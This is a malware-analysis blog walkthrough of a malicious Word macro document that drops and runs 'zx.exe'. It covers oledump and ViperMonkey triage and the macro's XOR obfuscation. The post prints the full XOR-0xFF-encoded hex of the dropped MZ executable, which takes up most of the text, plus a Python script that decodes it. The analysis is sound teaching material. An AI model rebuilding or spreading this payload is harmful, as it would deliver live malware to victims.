Malicious Office Document Analysis | Malware Club

Malware Club is starting up for the year, and part of the first meeting will be reviewing a malicious office document. I thought it would be nice to post the walk through here as well, just so that people can come back and review parts of it and grab the commands used.

Since this is a malicious office document, the first thing I’d recommend doing is changing the .doc file to a .bin, just to keep yourself from accidentally executing it in any way. Usually with Word files this isn’t an issue due to the fact that macros still need to be enabled, but it’s better to be safe than sorry.

From there, it’s time to jump into REMnux, which is a Linux toolkit for malware analysis and can be found here. It has a lot of tools that I’ll be using, but sometimes additions have to be made. One of which that isn’t required but that I do recommend is ViperMonkey. In some situations it can give you a good overview of what the malicious macros are trying to do.

Once REMnux is all setup it’s time to jump into the terminal and use oledump:

This shows me what macro streams are being produced and allows me to extract those streams do a text file like this:

Now you can open the streams in your favorite text editor. Feel free to change the syntax to fit, and in this I just used the Sublime editor. Here are brief looks at the inside of both streams:

From stream seven there seems to be some obfuscation going on, and then in stream 8 it looks like this is where the obfuscated code is utilized and executed. Let’s see what ViperMonkey has to say as well:

It looks like once the document is opened, it creates an executable titled “zx.exe” and then proceeds to execute it. This a little more unique, as a lot of these usually call out to a C2 or a random site to pickup the actual malware right after the macros are enabled.

Going back to stream 7, it appears that the variable “ouffer” is the obfuscated code that will be used in the executable. It also appears to be hex characters obfuscated with ampersands (&) and a XOR cipher. At the bottom there is a function that is used to deobfuscate the variable’s contents:

When it comes to these things, if I notice a function I don’t recognize I usually jump over to the Microsoft documentation to see what it does and how it works. For example, click here to check out the “LBound” function. From this code excerpt, it looks like it splits ouffer at the ampersands, and then XORs the values by FF. Just XORing the first two hex characters “0xB2” and “0xA5” by FF gives us values like “0x4d” and “0x5a”. These values correspond with the symbols “M” and “Z” indicating that this obfuscated code is the contents of an MZ executable.

To deobfuscate it, I kind of took a lazy way out. I copy pasted the code into an online tool which can be found here and told it to remove the ampersands, the variable declarations, equals signs, etc., until only the hex was left over. From there I ran over to repl.it and created a little bit of code to do the XORing because I need all of the practice I can get with Python. Here is the code that I created:

needXOR = "B2 A5 6F FF FC FF FF FF FB FF FF FF 00 00 FF FF 47 FF FF FF FF FF FF FF BF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 1F FF FF FF F1 E0 45 F1 FF 4B F6 32 DE 47 FE B3 32 DE AB 97 96 8C DF 8F 8D 90 98 8D 9E 92 DF 9C 9E 91 91 90 8B DF 9D 9A DF 8D 8A 91 DF 96 91 DF BB B0 AC DF 92 90 9B 9A D1 F2 F2 F5 DB FF FF FF FF FF FF FF 83 5C DE 4C C7 3D B0 1F C7 3D B0 1F C7 3D B0 1F A8 4B 2E 1F C5 3D B0 1F A8 4B 1A 1F C1 3D B0 1F CE 45 23 1F CE 3D B0 1F C7 3D B1 1F D9 3D B0 1F A8 4B 1F 1F C5 3D B0 1F A8 4B 2D 1F C6 3D B0 1F AD 96 9C 97 C7 3D B0 1F FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF AF BA FF FF B3 FE FC FF 5E D1 3D A1 FF FF FF FF FF FF FF FF 1F FF FD FE F4 FE F5 FF FF EF FF FF FF EF FF FF FF 8F FF FF 0F 77 FF FF FF 7F FF FF FF 6F FF FF FF FF BF FF FF EF FF FF FF FD FF FF FA FF FE FF FF FF FF FF FA FF FE FF FF FF FF FF FF 5F FF FF FF EF FF FF FF FF FF FF FD FF BF 7A FF FF EF FF FF EF FF FF FF FF EF FF FF EF FF FF FF FF FF FF EF FF FF FF FF FF FF FF FF FF FF FF 47 6E FF FF AB FE FF FF FF 6F FF FF 47 FE FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF F3 6C FF FF F3 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF AA AF A7 CF FF FF FF FF FF 8F FF FF FF EF FF FF FF FF FF FF FF FB FF FF FF FF FF FF FF FF FF FF FF FF FF FF 7F FF FF 1F AA AF A7 CE FF FF FF FF FF EF FF FF FF 7F FF FF FF F3 FF FF FF FB FF FF FF FF FF FF FF FF FF FF FF FF FF FF BF FF FF 1F D1 8D 8C 8D 9C FF FF FF FF EF FF FF FF 6F FF FF FF FB FF FF FF EF FF FF FF FF FF FF FF FF FF FF FF FF FF FF BF FF FF 3F FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF CC D1 C6 CE FF AA AF A7 DE F2 F6 FD F6 23 7B CA 93 30 1B 8A 76 8A 9B FF FF 1B F7 FF FF FF E3 FF FF D9 FF FF 07 02 00 24 00 AA 74 13 7E 13 CF F5 FF FF 5E FD DF FF CC 3A 76 BA 03 AC A9 A8 CC 3F 97 F9 FD 82 14 01 40 EF AF 72 72 1D 07 00 00 AE 99 76 7A 1F F8 17 EE F9 13 CC 2D DE D0 34 70 E5 AD 72 7A 25 09 AF 6A 27 09 0D 4D 03 37 36 AE 72 6A 0D 03 AD 72 0F 03 6F D8 D8 E4 AF 15 05 17 05 21 69 A4 84 97 FC FE F9 CD 06 01 95 A9 39 7A 07 48 90 E0 14 F7 FF E6 7C 3B C3 97 F8 FB 0F 00 EA D8 EF E7 33 92 53 D3 7F F5 EB 84 2F 0A E0 04 30 39 F3 FF F9 8F 74 27 74 B4 FB AE F4 C7 74 07 A8 88 00 00 27 95 BF F5 BF 74 0F 7A 09 8A EC A0 A1 A4 74 B2 03 CC 32 A9 FB 0E 74 11 38 91 12 1A A2 3D C9 DE FF A9 9A 74 AC FB 74 E2 D5 D2 29 02 22 87 AD 93 EF 6F A9 00 2C 97 F7 55 72 5E DB 12 88 49 6E AF A8 47 17 CD FB F3 67 F8 C6 27 27 CF A9 A1 A7 43 2A 0A 2B 0A 98 4E 08 DA F3 97 FB E3 EC 5B DB 06 C4 27 08 7A 3F 8B F1 9A 6B B1 14 F3 F2 5B 72 6A 30 E3 93 13 AD DC B7 CA 1F 07 E2 C9 68 11 4E 4B E9 A3 74 C2 C8 FB 27 09 95 FF A4 08 8C 86 2F 1F 07 28 74 CA F1 AB 95 27 24 35 F1 60 09 29 72 87 DA E0 0F D3 A7 94 6E 03 E7 FE B6 85 21 68 4E E9 F0 5F 7F F0 7A 42 FF 80 22 4D 64 3A D5 AE 30 FD 03 FB E3 7B 4F 58 64 62 5F C5 98 6A AD 53 6A F0 F8 88 74 35 B2 42 B8 27 AD 27 A6 FB 48 CD EB 98 2F 00 B3 58 89 DE 3D 27 D7 35 D3 8B 1F 47 F4 F9 2F 2F A5 4D 4E 5C CA DC 15 A7 7B 3C 64 FC B3 A9 B0 9B C4 1E 9F D2 D7 9E EE F7 13 87 9A 7C B2 61 99 E7 6A AD 33 E3 D3 EB F3 98 8B CF 06 00 04 A4 11 B7 C9 DF 03 33 FF 00 7C 13 F3 80 94 22 C4 F3 95 DF 95 FC FA FE A5 FF 7F AF 38 BA 0B FF 8E A4 39 CF B1 CB 7C A4 8A F8 9A 73 92 48 3C A0 C2 3C AC DA A8 8D F7 5A 3C C1 08 7A 24 8B D1 CB FE FD E9 BB BD 49 4C 3E 45 07 3C E9 E8 FB 7A F3 EA 03 F8 39 3E A1 8A F7 A4 BA A9 AC 5E 8B 9F 4B E0 39 B0 AC 71 AC 74 A2 03 E3 99 DC D3 9C 11 E7 AC C9 3A EF 07 CE AF 08 39 41 92 09 2C 97 2C 74 AA F7 4C FD 85 4C E4 89 C4 13 BF AD 53 7A 54 F6 A1 98 03 88 49 CA 7C E2 32 C9 A9 61 DF C3 9D 11 E9 F3 43 DB 47 FE C6 D8 01 20 65 EF F0 F7 FD CC 09 A8 74 82 F7 76 8A 07 14 FC 40 44 E0 10 F8 F0 49 FB C1 73 DF F7 67 FA E3 46 F6 D5 3E DC 9C 12 12 77 BA 01 E7 BB C1 FE A4 EA 45 3D 10 7E 02 D3 00 FD AF AD D4 75 27 D5 00 9F A4 6F FC AD 07 D2 75 AA 00 75 37 75 3C 24 90 20 01 77 B2 02 3F 1F F9 F5 D9 B2 01 FD 36 FE 3F 15 FB F5 2E 45 F3 22 90 40 0F 77 EB F0 B8 FA DF 7C 39 FB 76 CE 7F 04 BF 8B ED D0 3F 90 40 09 09 14 FD 3F 1D E0 25 77 E3 E3 E9 82 02 E8 F8 77 FB 56 4F 02 9C F3 C4 8A EF F0 73 B4 00 FF 74 7B 0B 02 BD 3D 21 26 FF E9 3D FB FF C4 F2 80 9F 22 80 13 8A FD 0C 3C 16 72 25 E0 72 BD 00 A4 3C 7A 48 09 1E 72 5B DB 02 72 9B F9 D0 75 BB DB F0 44 48 7A F4 15 3E 1F 10 AB F6 08 3D FC E6 8B EA F4 C0 04 00 75 F5 7C 3D FE C5 34 8B 30 7B 36 8B AE EB 8A 14 F4 27 CB 3C 02 00 00 09 3E 1C EF A9 F7 74 F5 40 00 01 01 81 74 3E 74 08 CC 34 FC 0F FC 06 7C 0E 00 7C 81 00 48 90 36 CC 30 CC 39 C7 FB 7E 1E FF FE FE 7E 8A E3 DA F9 8B 2C 79 80 23 87 FE E4 7E 19 84 8A 3B A1 A0 42 00 90 03 F4 46 BD 03 C5 3C 8B C9 7B B5 10 C5 1C 8B D8 7B 1B 8B 18 3E 17 12 59 96 45 EF ED EA 23 F9 2B 14 69 D2 8C 2D 46 98 4C BD 01 C8 F9 02 03 82 14 B9 1F 74 00 20 D7 61 5C FD DE A7 76 F2 23 23 23 23 FA AB 76 EA AF 76 E2 B3 76 CA B7 76 C2 D4 32 09 22 BB 99 73 E7 8F F9 F2 9B DF 5A A6 65 12 BF EB FA C3 DA C7 72 EA 61 64 D2 CB 63 70 97 9B A9 A3 4D 0B 06 4C F8 FB 9F 72 BA F7 93 74 54 03 11 92 72 22 38 DC DF 57 9E FE 5E E3 E6 9C 93 1E 27 DF A3 EC AF F6 7D 3F F6 AB 80 60 94 72 3E 86 76 96 CD F5 FB CB E9 3C D3 23 5D CB 5F A0 7C 0B 56 6B E6 1F A6 28 E7 A0 77 3C E9 21 9C F5 9B 7C C2 DF 85 F7 DC 23 C2 DE 42 97 A4 01 36 3C 7C 45 DC 87 FF 0F 29 E4 9D F6 3C F3 74 B3 DB 34 2D 8B 96 48 F9 A0 67 24 B2 8A E9 7E 05 A4 B1 8D F1 F5 C4 E9 C1 DC 8B 21 FA E8 F8 99 33 3D 00 00 E8 4A 05 FB 8D CE 08 26 7C 1E FC 8B F3 D4 2E 77 F8 7C 38 FE 7C 16 55 12 19 24 0E 09 74 37 F0 FC 3E F9 EF 35 7C 1D FA 62 4C 11 3D 16 FD 6D 0C 54 A7 F5 D8 15 0A 72 40 24 9F A0 3C FA FB 3C 99 F0 10 3F AE B7 3E 7C 1F F0 9F 43 4F 22 F7 80 74 3D CC 80 2F F8 8B C8 92 18 06 89 48 E0 80 FE FC BE EF FB DF CF 04 04 86 61 BF AF 9F 8F 72 76 55 B7 8A 2F 97 4E B4 90 52 C8 BB BE FB 8B F0 5C 72 B6 C0 12 52 CA 97 F9 C0 8B A7 F0 8B E3 E5 B5 48 5A 09 CC 24 3E 15 6D 3C E6 EA FB B5 37 80 84 04 29 88 3C F9 77 E6 BE DF 05 A4 A7 6D 27 08 24 7C 3C EF 68 C4 08 3D D4 2C FB AD 74 2C 41 E4 FE BE B5 3E 14 0F 3C 2D 83 CC FE B4 A5 F8 8A 95 F5 7F 8A E3 71 B6 97 5C E3 66 FF FF AE 5C FB EE E9 7A 01 AD 00 D1 DA 88 8C FF D0 8A FF D1 FF 9B FF 9E 77 AF BD 45 E8 96 F0 CD 0E 11 72 41 31 AA FF AC FF 84 AD FF AF FC B0 FF B9 FF 20 83 28 92 02 B3 F0 DA AA AB FF 92 FF 8F 9C 92 9B DF D0 40 04 64 00 9C DF 9A 87 8F 9E 91 9B DF DF D2 B9 C5 D5 DF DD F6 DD DF D9 D9 DF 9B 48 13 92 24 9A 93 E0 99 FD 8E E4 D0 E0 DD FF 74 00 A3 85 87 D1 9D 9E 8B DD 1A FA BB E9 F6 AB 00 00 00 E0 B1 19 BF 44 4E E6 40 BB CD AF 97 BC DE B7 A5 9A 8A C8 8E 85 A9 C6 88 AE AA 9D 93 00 00 00 00 BB 99 BD 9E 94 8F 86 8D 90 CA 89 B2 A8 98 BE A7 8C CE AB D2 CB B8 B6 C2 CC B5 87 AC 95 B3 AD 92 FE 6E 03 00 B1 C7 B0 CF B9 8B 9B 91 9C C9 96 BA B4 A6 7F 7B 37 B9 FF 3F 1D AA AB F7 DB 0C 6B 3A D5 D5 0E 57 6D AA EE AE FE 49 5D EF 00 40 C3 E8 67 EF FE B8 9A 8B BC 90 92 92 9E 91 9B B3 96 FA 04 80 1B 91 9A A8 AB 9A 92 8F B9 96 93 9A B1 9E 92 EE 24 04 20 01 F2 AC 96 85 9A F3 B2 9E 8F A9 96 9A 88 B0 99 ED F1 AA 13 40 A2 27 91 92 EF AC D3 BA 8D 8D 90 8D B2 90 9B F2 08 80 8C 24 DE 97 A3 E5 9B BA 87 9C 9A 8F 8B 96 90 91 D7 A4 04 89 89 8B 9A 8D 85 8A D4 9A 91 8B AF CF E4 8C 44 64 4A 48 8C ED A8 8D 96 E5 B7 E2 AC 86 8C F2 8C 48 24 80 92 A8 90 88 C9 CB BB 96 D8 9C 8B A9 86 BE AB E1 24 12 36 A5 B7 69 BE 8B 8B CB 9D 8A D7 8C 36 25 89 8C 55 46 8D 92 39 9E F3 AE 24 29 32 49 BC C8 9E AD E1 93 B0 8D F7 91 20 49 26 98 2C B3 9E 8C 55 F2 B3 D3 9E 93 BE 93 24 45 7E 4A 93 F9 CF 15 8F B3 98 C8 21 29 65 F8 9C 9E 8B A8 EF 38 9A D9 B6 41 3A 21 D3 8C 9A B7 26 9B BB 9A 93 9A F4 5D 94 9C B3 B9 BA E8 BA 79 32 8A A4 04 BA 91 89 42 09 92 17 AC 54 AE 94 12 29 81 56 B6 8C CB 4A 98 98 4F 55 57 92 7A 2F A3 E5 ED D6 D3 A7 14 49 9F 30 53 B9 62 8A CE CB DF 63 99 DE 37 5A 8F 3A 01 CB 24 C0 AB 90 BE 8D 98 89 A8 E3 4E 7F AA AD B3 BB 8B 50 22 E9 B9 91 4C 9E 9B E3 58 E3 43 A7 9E 08 2C 87 88 8C 8F 6A 8B 99 A5 FF 34 00 00 00 F1 69 F9 F4 F2 F8 F3 F4 D4 F9 D1 D0 F6 F1 F2 EE F9 F9 F1 F0 E8 D3 B5 EA F9 C4 C3 00 00 00 F8 ED F7 F8 BE E7 E8 E9 E6 D8 F6 E0 DE F5 CB F5 E9 E9 E7 82 0F 0C FF F9 F8 89 04 40 63 F7 F3 F6 FA F9 F5 F6 F4 F3 FA EF F8 F9 E9 EE 00 AD 00 00 D5 0F E7 FE FA 0F A4 F7 FB 0F 8B E0 FF AF BA 8C B3 FE F9 FF 5E D1 3D 89 49 00 6F A1 1F FF FD FE F4 FE F5 80 F5 EB 62 82 7C F2 EF FC DF F3 BF F4 FD 45 C8 74 43 E1 FA FF FE F8 02 E1 FB 34 21 04 A3 0A DE BF 7A D7 FD F8 30 0D 4D 85 F9 F3 E3 DE 9B AF 9B E6 BF D1 4B FE 9F 37 F0 9B 22 7F 58 77 E1 D1 8B 9A 9A A0 4F 32 87 8B CB F7 6F 14 FB BD 20 26 E9 C1 9F D1 8D 9B 1E 9E E4 A7 04 F9 53 C6 93 F6 EC FD BF D1 D9 5B 96 65 A4 D8 83 FC CF FD EB 98 6C 10 58 3F D1  BC AD AB EF FB D8 E9 26 CA F1 9F B0 8D 8C 1C D8 4B FE 16 FF E6 5B AF E7 9A D8 B5 F9 06 25 BD D8 9F E5 47 6E 24 90 BD E4 F7 DD ED E4 9D 85 F9 FF FF FF FF FF FF ED FF 00 FF FF FF FF FF FF FF FF FF FF FF FF 9F 41 FF 7F BF FF 72 41 FF 6F 00 00 A8 14 F4 6F 75 F9 B9 77 F8 B8 FE 24 8A F8 74 E1 7C 11 03 EE 24 8D 12 47 FE FF FF FF FE 24 8A F8 74 E1 7C 11 03 EE 24 EE 3F FE 24 8C 10 8A F6 74 E1 7C 11 03 EE 24 8C 1B CE 36 7C 17 FC 8D F2 3E 1F F7 75 F9 B9 7C 0F 00 8B 8B 76 3A FE 24 8A F8 74 E1 7C 11 03 EE 24 EE 36 FE 24 8A F8 74 E1 7C 11 03 EE 24 EE 36 8A DF BE FE 24 8A F8 74 E1 7C 11 03 EE 24 EE 36 FE 24 8C 10 8A F6 74 E1 7C 11 03 EE 24 8C 1B 7C 3E FD 7E 02 FF 0C 00 00 7C 2E FE 72 EB D0 7C 02 03 89 F0 75 FD BD 77 F8 B8 B6 8A 08 16 9C 00 00 00 6F 74 FD 7C 3D FB 76 F8 7C 38 FB 7C 16 FB 88 0E FE 30 16 B3 00 00 00 A1 76 08 46 E7 FF FF FF 75 F8 B8 D3 17 C3 FE 88 08 7F C0 FF 8A 0D 74 F8 75 A0 FB 99 3E 17 F7 3E 3F EF 79 3B D6 07 7F 14 17 FE 0F 76 F8 7C 38 FA 77 27 1D 26 72 41 FF 9F FF FF 74 F8 F6 3F 8B C3 74 A0 FB 72 7B CF 47 7E FF FF FE 0C AF 7C 38 F7 00 69 E3 7D FF FF 6A 75 F8 B8 F7 3F 8B 23 76 06 A8 B7 0D 51 AA 00 69 DF 7D FF FF F6 3F 8B F8 76 FC 7C 3C FB 14 1E 00 69 CF 7D FF FF 7C 38 FB 72 A1 03 CE 3F 75 F8 B8 F6 3F 8B DD C3 10 88 EE FE 3C 74 FC 79 3B 3E 3F EF 79 3B FE 0F 76 FC 14 1D DB F0 3E 1F EF 99 74 F8 7C 38 FD 14 1D 74 51 DB 7D FF FF 72 41 FF 0F 00 00 44 FF EF FF FF AF AB 95 FB AC A8 00 2A 72 78 00 FE FF FF 7F DF 80 7F 9F D7 80 A7 AF AB AF AC A8 00 2A A7 9E 72 BB DB 7F 95 FF C6 3B 8A 05 7C 13 7F 16 A8 7A 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FB FF FF FF FF FF FE FF E7 FF FF FF E7 FF FF 7F FF FF FF FF FF FF FF FF FB FF FF FF FF FF FE FF FE FF FF FF CF FF FF 7F FF FF FF FF FF FF FF FF FB FF FF FF FF FF FE FF F6 FB FF FF B7 FF FF FF A3 6F FF FF A5 FE FF FF 1B FB FF FF FF FF FF FF A7 AF FF FF C3 9E 8C 8C 9A 92 9D 93 86 DF 87 92 93 91 8C C2 DD 8A 8D 91 C5 8C 9C 97 9A 92 9E 8C D2 92 96 9C 8D 90 8C 90 99 8B D2 9C 90 92 C5 9E 8C 92 D1 89 CE DD DF 92 9E 91 96 99 9A 8C 8B A9 9A 8D 8C 96 90 91 C2 DD CE D1 CF DD C1 F2 F5 DF DF C3 8B 8D 8A 8C 8B B6 91 99 90 DF 87 92 93 91 8C C2 DD 8A 8D 91 C5 8C 9C 97 9A 92 9E 8C D2 92 96 9C 8D 90 8C 90 99 8B D2 9C 90 92 C5 9E 8C 92 D1 89 CC DD C1 F2 F5 DF DF DF DF C3 8C 9A 9C 8A 8D 96 8B 86 C1 F2 F5 DF DF DF DF DF DF C3 8D 9A 8E 8A 9A 8C 8B 9A 9B AF 8D 96 89 96 93 9A 98 9A 8C C1 F2 F5 DF DF DF DF DF DF DF DF C3 8D 9A 8E 8A 9A 8C 8B 9A 9B BA 87 9A 9C 8A 8B 96 90 91 B3 9A 89 9A 93 DF 93 9A 89 9A 93 C2 DD 9E 8C B6 91 89 90 94 9A 8D DD DF 8A 96 BE 9C 9C 9A 8C 8C C2 DD 99 9E 93 8C 9A DD C1 C3 D0 8D 9A 8E 8A 9A 8C 8B 9A 9B BA 87 9A 9C 8A 8B 96 90 91 B3 9A 89 9A 93 C1 F2 F5 DF DF DF DF DF DF C3 D0 8D 9A 8E 8A 9A 8C 8B 9A 9B AF 8D 96 89 96 93 9A 98 9A 8C C1 F2 F5 DF DF DF DF C3 D0 8C 9A 9C 8A 8D 96 8B 86 C1 F2 F5 DF DF C3 D0 8B 8D 8A 8C 8B B6 91 99 90 C1 F2 F5 C3 D0 9E 8C 8C 9A 92 9D 93 86 C1 AF BE FF FF FF FF FF FF FF FF FF FF FF FF AF 6D FF FF E3 6D FF FF FF FF FF FF FF FF FF FF FF FF FF FF A2 6D FF FF C7 6D FF FF FF FF FF FF FF FF FF FF FF FF FF FF 96 6D FF FF BF 6D FF FF FF FF FF FF FF FF FF FF FF FF FF FF 8B 6D FF FF B7 6D FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 81 6D FF FF 73 6D FF FF 63 6D FF FF 53 6D FF FF 45 6D FF FF 37 6D FF FF FF FF FF FF 29 6D FF FF FF FF FF FF 15 6D FF FF FF FF FF FF 01 6D FF FF FF FF FF FF B4 BA AD B1 BA B3 CC CD D1 BB B3 B3 FF AC B7 BA B3 B3 CC CD D1 9B 93 93 FF 8A 8D 93 92 90 91 D1 9B 93 93 FF AA AC BA AD CC CD D1 9B 93 93 FF FF B3 90 9E 9B B3 96 9D 8D 9E 8D 86 BE FF FF B8 9A 8B AF 8D 90 9C BE 9B 9B 8D 9A 8C 8C FF FF A9 96 8D 8B 8A 9E 93 AF 8D 90 8B 9A 9C 8B FF FF A9 96 8D 8B 8A 9E 93 BE 93 93 90 9C FF FF A9 96 8D 8B 8A 9E 93 B9 8D 9A 9A FF FF FF BA 87 96 8B AF 8D 90 9C 9A 8C 8C FF FF FF BC 90 92 92 9E 91 9B B3 96 91 9A AB 90 BE 8D 98 89 A8 FF FF AA AD B3 BB 90 88 91 93 90 9E 9B AB 90 B9 96 93 9A A8 FF FF 88 8C 8F 8D 96 91 8B 99 BE FF FF FF FF 7F FF FF F3 FF FF FF 0D C7 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF"

endval=""
fVal = "FF"

for i in range(len(needXOR)):
  if i == 0:
    newXOR = needXOR[i] + needXOR[i+1]
    hi = hex(int(newXOR, 16) ^ int(fVal, 16))
    endval += hi + " "

  if needXOR[i] == " ":#space
    newXOR = needXOR[i+1] + needXOR[i+2]
    hi = hex(int(newXOR, 16) ^ int(fVal, 16))
    endval += hi + " " 
    
  else:
    continue


print(endval)

And here it is actually working on a smaller sample:

I then took the output my code gave me and plugged it into CyberChef using the “From Hex” setting with the delimiter set to “Auto”. I received this output:

From this image I’m able to see that the obfuscated code was indeed an MZ executable file, and I now have the contents of it. This is where I’ll stop this post, but from this point on the code can be turned into an executable file and studied in a program like Ghidra or IDA Pro.

Thanks for reading!